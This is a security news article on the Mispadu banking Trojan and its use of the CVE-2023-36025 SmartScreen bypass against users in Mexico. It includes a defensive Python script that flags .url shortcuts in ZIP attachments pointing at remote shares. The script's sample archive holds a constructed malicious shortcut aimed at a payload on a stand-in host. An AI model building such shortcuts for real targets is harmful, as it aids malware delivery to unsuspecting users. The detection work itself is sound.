The Mispadu banking Trojan has once again made headlines, this time leveraging a now-patched Windows SmartScreen security bypass flaw to compromise users in Mexico. Palo Alto Networks Unit 42 disclosed details of a new variant in a recent report; the malware itself was first identified in 2019, and the new campaign illustrates its adaptability and persistence.
Phishing Emails and CVE-2023-36025 Spreading Mispadu
The initial access vector is phishing email. Mispadu is a Delphi-based information stealer that primarily targets victims in the Latin American (LATAM) region. In March 2023, Metabase Q reported that Mispadu spam campaigns had harvested more than 90,000 bank account credentials since August 2022.
Infection Chain
The infection chain identified by Unit 42 starts with a ZIP archive delivered by email that contains a rogue internet shortcut (.url) file. The shortcut exploits CVE-2023-36025, a high-severity security feature bypass in Windows SmartScreen that Microsoft patched in November 2023. The flaw lets a specially crafted internet shortcut file or hyperlink bypass the SmartScreen warning that would normally appear before content from an untrusted source runs; in this campaign the shortcut's target is a malicious binary hosted on a network share controlled by the threat actor. SmartScreen is a warning layer, not an execution control, so on unpatched systems the user sees nothing before the payload is fetched from the share.
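One check a defender can run against inbound ZIP attachments regardless of patch status, written here as an added example and not code from the Unit 42 report: open each .url member, read its URL= target, and flag any shortcut whose target is a UNC path or a file:// URL with a remote host rather than an http(s) site. The sample archive, the host 192.0.2.10 and the share name are constructed for illustration.

```python
"""Flag internet shortcut (.url) files inside a ZIP archive whose target is a
remote network share, the delivery pattern described for CVE-2023-36025.

Added example, not code from the Unit 42 report. The sample archive, hosts and
share names below are constructed for illustration.
"""
import configparser
import io
import zipfile
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# A .url file is INI-style text: an [InternetShortcut] section with a URL= key.
SHORTCUT_SECTION = "InternetShortcut"
LOCAL_HOSTS = {"", "localhost", "127.0.0.1"}


def parse_url_file(data: bytes) -> Optional[str]:
    """Return the URL= target of a .url file, or None if it is not a shortcut."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        parser.read_string(data.decode("utf-8", errors="replace"))
    except configparser.Error:
        return None
    if not parser.has_section(SHORTCUT_SECTION):
        return None
    # ConfigParser lower-cases option names, so "URL" and "url" both match.
    return parser.get(SHORTCUT_SECTION, "URL", fallback=None)


def is_remote_share_target(url: str) -> bool:
    """True if the target is a UNC path or a file:// URL with a remote host.

    https:// targets are the normal case for a shortcut and are not flagged;
    file:///C:/... (no host component) is local and is also not flagged.
    """
    url = url.strip()
    if url.startswith("\\\\"):  # UNC path: \\host\share\payload.exe
        return True
    parsed = urlparse(url)
    if parsed.scheme.lower() != "file":
        return False
    host = parsed.netloc.strip().lower()
    return host not in LOCAL_HOSTS


def scan_zip(archive: bytes) -> List[Tuple[str, str]]:
    """Return (member name, target) for each .url member pointing at a remote share."""
    findings: List[Tuple[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(".url"):
                continue
            target = parse_url_file(zf.read(info))
            if target and is_remote_share_target(target):
                findings.append((info.filename, target))
    return findings


def build_sample_archive() -> bytes:
    """Constructed sample: one benign shortcut and one pointing at a UNC share."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.url",
                    "[InternetShortcut]\r\nURL=https://example.com/invoice\r\n")
        zf.writestr("factura.url",
                    "[InternetShortcut]\r\n"
                    "URL=\\\\192.0.2.10\\share\\factura.exe\r\n"  # hypothetical share
                    "IconIndex=0\r\n")
        zf.writestr("readme.txt", "not a shortcut\r\n")
    return buf.getvalue()


if __name__ == "__main__":
    for name, target in scan_zip(build_sample_archive()):
        print(f"suspicious shortcut {name!r} -> {target}")
```

The check keys on the delivery artifact rather than on the SmartScreen behaviour, so it is useful on mail gateways and in sandbox triage even after the November 2023 patch is applied. The exact set of file:// spellings attackers use varies; the UNC and file://host forms handled here are the common ones, and anything else is an assumption to tune against local samples.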
Once active, Mispadu checks the victim's geographic location and system configuration before proceeding, then contacts a command-and-control (C2) server to exfiltrate stolen data. The Trojan belongs to the wider family of LATAM banking malware and shares connections with Grandoreiro, whose operation was recently dismantled by Brazilian law enforcement.
Mexico has emerged in recent months as a prime target for various cybercrime campaigns, including those distributing information stealers and remote access Trojans. Notable among the actors involved is the financially motivated group TA558, which has targeted the hospitality and travel sectors in the LATAM region since 2018.
Mispadu has previously targeted Brazil and other Latin American countries, a region long favoured by financially motivated cybercriminals.